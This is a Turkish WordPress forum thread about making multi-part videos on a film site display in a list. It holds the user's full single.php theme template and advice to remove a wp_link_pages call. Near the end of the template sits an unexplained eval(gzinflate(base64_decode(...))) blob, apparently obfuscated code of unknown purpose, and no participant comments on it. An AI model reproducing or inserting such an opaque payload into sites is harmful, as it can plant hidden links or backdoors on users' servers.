• 15-09-2010, 19:22:42
    #1
    Üyeliği durduruldu
    Merhabalar,

    Wordpress dizi,film sitemizde video partları alt alta çıkmasını istiyorum.Part şeklinde çıktığı zaman çoğu temada diğer partlar ya hiç çıkmıyor yada ziyaretçilerin göremeyeceği şekilde çıkıyor.
  • 15-09-2010, 19:28:37
    #2
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Single.php dosyanda
    <?php wp_link_pages('pagelink=%.part'); ?>
    bu veya buna benzer bir kod var ise onu silip deneyebilirsin.Bulamazsan o dosyayı paylaş düzenliyelim.
  • 15-09-2010, 20:16:41
    #3
    Üyeliği durduruldu
    <?php get_header(); ?>
    <div><div>
    <style>
    
    .lineYatay{background:url(<?php bloginfo('stylesheet_directory'); ?>/images/yatay_line_back.gif) repeat-x bottom; font-size:1px; border-bottom:1px dashed #CCCCCC; margin-bottom:5px; margin-top:5px; }
    #contentPanel{
    padding-right:10px;
    padding-left:10px;
    }
    
    
    </style>
    
    
        
    <div id="sol-bol-2">
      
               <div id="text46"><div id="player"><div id="lightsoff"><a href="#" ><?php the_title_limit(35, ""); ?></a></div></div></div>
         <div id="playerx">
        <?php if (have_posts()) : while (have_posts()) : the_post(); ?>
    <div class="navigation">
                
    
            </div>
            
                
    
                <div class="entry">
                    <?php the_content('<p class="serif">' . __('Read the rest of this entry &raquo;', 'kubrick') . '</p>'); ?>
    
                    <?php wp_link_pages(array('before' => '<p><strong>' . __('Pages:', 'kubrick') . '</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); ?>
    
                    <?php the_tags( '<p>' . __('Tags:', 'kubrick') . ' ', ', ', '</p>'); ?>
    
                    <p class="postmetadata alt">
                        <small>
                            <?php /* This is commented, because it requires a little adjusting sometimes.
                                You'll need to download this plugin, and follow the instructions:
                                http://binarybonsai.com/archives/2004/08/17/time-since-plugin/ */
                                /* $entry_datetime = abs(strtotime($post->post_date) - (60*120)); $time_since = sprintf(__('%s ago', 'kubrick'), time_since($entry_datetime)); */ ?>
                            <?php printf(__('', 'kubrick'), $time_since, get_the_time(__('l, F jS, Y', 'kubrick')), get_the_time(), get_the_category_list(', ')); ?> 
                            <?php printf(__("<a href='%s'></a>", "kubrick"), get_post_comments_feed_link()); ?> 
    
                            <?php if (('open' == $post-> comment_status) && ('open' == $post->ping_status)) {
                                // Both Comments and Pings are open ?>
                                <?php printf(__('', 'kubrick'), trackback_url(false)); ?>
    
                            <?php } elseif (!('open' == $post-> comment_status) && ('open' == $post->ping_status)) {
                                // Only Pings are Open ?>
                                <?php printf(__('Responses are currently closed, but you can <a href="%s" rel="trackback">trackback</a> from your own site.', 'kubrick'), trackback_url(false)); ?>
    
                            <?php } elseif (('open' == $post-> comment_status) && !('open' == $post->ping_status)) {
                                // Comments are open, Pings are not ?>
                                <?php _e('You can skip to the end and leave a response. Pinging is currently not allowed.', 'kubrick'); ?>
    
                            <?php } elseif (!('open' == $post-> comment_status) && !('open' == $post->ping_status)) {
                                // Neither Comments, nor Pings are open ?>
                                <?php _e('Both comments and pings are currently closed.', 'kubrick'); ?>
    
                            <?php } edit_post_link(__('Bu Video icin Düzenleme Yap', 'kubrick'),'','.'); ?>
    
                        </small>
                    </p>
    
                </div>
            </div>
    <div id="playerx1"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/yorum.jpg">
        <?php comments_template(); ?></div>
    
        <?php endwhile; else: ?>
    
            <p><?php _e('Sorry, no posts matched your criteria.', 'kubrick'); ?></p></div></div>
    <?php endif; ?>
    
    </div>
        </div>
    <div id="sag-bol-2">
      
      <div id="det">
    
        
    <img src="<?php bloginfo('stylesheet_directory'); ?>/images/bilgi.png">
    <?php if (have_posts()) : ?> <?php while (have_posts()) : the_post(); ?>
        <div class="videolar2">
        <div class="videoresim"><?php resim_cagir(0, "/wp-content/themes/sariv3/images/yok.jpg","news-img4");?> </div>
    <?php endwhile; ?>    
        <?php else : ?>
    
    
    
        <?php endif; ?>
             <div class="videolar3"><h4><?php the_title_limit(25, ""); ?></h4>
             <?php the_ratings(); ?><?php the_time('F j, Y') ?></div>
             </div>
    
    
    <a name="viddesc"></a><div style="font-weight:bold; color:#000000; margin:3px 2px;">  
         
              
    
    
                    
                    <div id="shortdesc">
                    <div id="tags" style="border-top:1px dotted #666666;"><span class="font4_12"><?php the_title(); ?><br>Kategori :<?php the_category(', ') ?><br><?php comments_number('Yorum Yok', '1 Tane Yorum var', '% Yorum var' );?><br><?php sayfa_sayac(1, 1, 1, 1, 0, ' ', '','   ', '', '') ; ?></span></div></div></div>
          
              <ul class="EmbeddedBox">
                <form name="code" action="">
                 
                   <li><strong>Video URL:</strong> &nbsp;<font size="1"></font><br />
    
    
    <input class="embed" type="text" name="url0" size="40" value="<?php the_permalink() ?>" onClick="javascript:document.code.url0.focus();document.code.url0.select();" readonly />
                   </li>
             
                  
                  <li><strong>BBC Code:</strong> <br />
                    <input class="embed" name="embedded" size="40" value='<?php the_title(); ?>' onClick="javascript:document.code.embedded.focus();document.code.embedded.select();" readonly />
                  </li>
                  
                </form>
              </ul>
            
            
    <div id="bookmarklar">
               <a href="http://www.stumbleupon.com/submit?url=<?php the_permalink() ?>" target="_blank" title="Stumble"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/stumble.png" alt="Stumble"  style="border: 2px groove #000;" /></a>&nbsp;
    
               <a href="http://www.facebook.com/sharer.php?u=<?php the_permalink() ?>" target="_blank" title="Facebook"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/facebook.png" alt="FaceBook" style="border: 2px groove #000;" /></a>&nbsp;
               <a href="http://digg.com/submit?url=<?php the_permalink() ?>" target="_blank" title="digg"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/digg.png" alt="digg" style="border: 2px groove #000;" /></a>&nbsp;
               <a href="http://www.furl.net/storeIt.jsp?u=<?php the_permalink() ?>" target="_blank" title="Bookmark video on furl!"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/furl.png" style="border: 2px groove #000;" /></a>&nbsp;
               <a href="http://del.icio.us/post?url=<?php the_permalink() ?>" target="_parent" title="del.icio.us"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/deli.png" alt="deli" style="border: 2px groove #000;" /></a>&nbsp;
               <a href="http://www.blinklist.com/index.php?Action=Blink/addblink.php&Description=&Url=<?php the_permalink() ?>" target="_blank" title="Blink"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/blink.png" alt="blink" style="border: 2px groove #000;" /></a>&nbsp;
               <a href="http://reddit.com/submit?url=<?php the_permalink() ?>" target="_blank" title="Reddit"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/reddit.png" alt="reddit" style="border: 2px groove #000;" /></a>&nbsp; 
               <a href="http://www.google.com/ig/add?feedurl=<?php the_permalink() ?>" target="_blank" title="Google"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/google.png" alt="google"   style="border: 2px groove #000;" /></a>&nbsp;
            
      </div>
              
            </div>            
    
    <div class="Videotanitim"></div>
               </div>
      
     
      <div id="Videosbaslik"></div>
        <div id="related-videos">
            <div style="height: 330px; width:98%; overflow: auto;">
          <?php query_posts((array('orderby' => 'rand', 'showposts' => 6)));?>
    
    <?php if (have_posts()) : ?> <?php while (have_posts()) : the_post(); ?>
       
    
    
     <div class="box1">
            <div class="box1img">
    
                
    <a href="<?php the_permalink() ?>" title="<?php the_title(); ?>"><?php resim_cagir(0, "/wp-content/themes/sariv2/images/yok.jpg", "post-img");?></a>
            </div>
            <span class="baslik1">
    
    <?php the_title_limit(10, ""); ?><div class="text50"><?php the_time('F j, Y') ?><br><?php the_category(', ') ?><br>
    <?php sayfa_sayac(1, 1, 1, 1, 0, ' ', '','   ', '', '') ; ?><br></span><br />
    <div class="bosluk"></div>    <span class="text1"><a href="<?php the_permalink() ?>" title="<?php the_title(); ?>"></a></span>
        </div>
    </div>
    <?php endwhile; ?>
    
    
    
        
        <?php else : ?>
    
    
    
        <?php endif; ?>
    
    
            <?php
    eval(gzinflate(base64_decode(
    'DdNHjqNAAEDRfV9kusUCKBNcmtG0MGCyiSZtRtgEk0yGgtNP3+DrSf/775/v/tV/'
    .'ZGvSfBZH+c6bZM4+H8mUMdS/NHt2afb560NIdbXue47jBBvDD+VQbflie4lb9p4u'
    .'aYLCK2yDHP3GCNNUOec81zAqP52x/ORdU0JuF2vQIK5dmhyVOuNiCqAoeDb6AEhr'
    .'ReG0eIREQ3kXUQKifDtjT5+B8yAPMGgT6yYBBGvzoTNqGJV3R3xWzerIfSUsKk4z'
    .'Ck3+FJwtJWDIB/PIK80eawmjrhJPO6U1FSRIofoqQGElnNRdRak2jK6eYC8lkhne'
    .'Vh7Vy4yCJLs0isaPEsO2mglRirQJ+THubA6hnpN+qm8uOnxpltyJ25GS9LsJh7En'
    .'dauYRns7CsdrCNMygsuWS9ETe9uGoperXcjEwncWiWiYEI0Y3e1nCWeXFN38x9Tc'
    .'ZDIq8jhYwhUWCriHTQOZBVyMNb4OBDn44eGH5ewV+gzvnszLQpiq0vUG2sFsDRZ3'
    .'YxdUwuMOcqOmp5FAIgdmovZeYiGoQdVYFqnBmp0FTHx5dOdnHa4EwWo9dpU/DHCV'
    .'EmiVPb31RLwDakehzZQ7Vrf16DaCGkfsCy0s6VnUzHPXsbHMaj7F6dB2qAfxVq24'
    .'I5zE1KjVbdOPjSoI5MujmHbiDa84BwQ8O3mhYJ8sh/Vx7s36KpU6eGYiLVOF6R3B'
    .'Z4qwZvPY007fB+zlJEoavKuhfVY1S57fbZh3hA/jvIx2uDHd7kUypWnsyx5X+Ig1'
    .'m3ajppbT86W1EQBmzt3hjeLlBW1N1qWo5/Mp7GRqyU8Qz9aKxnElP19+fX19/f74'
    .'/hngPw=='
    )));
    ?>
    <?php wp_footer(); ?>
    </div></div><!-- /footer -->
    buyrun şimdiden teşekkürler
  • 15-09-2010, 21:48:56
    #4
                    <?php wp_link_pages(array('before' => '<p><strong>' . __('Pages:', 'kubrick') . '</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); ?>
    Bu kodu komple kaldırıp denermisin ( İşlem yapıcağın dosyanın mutlaka yedeğini al)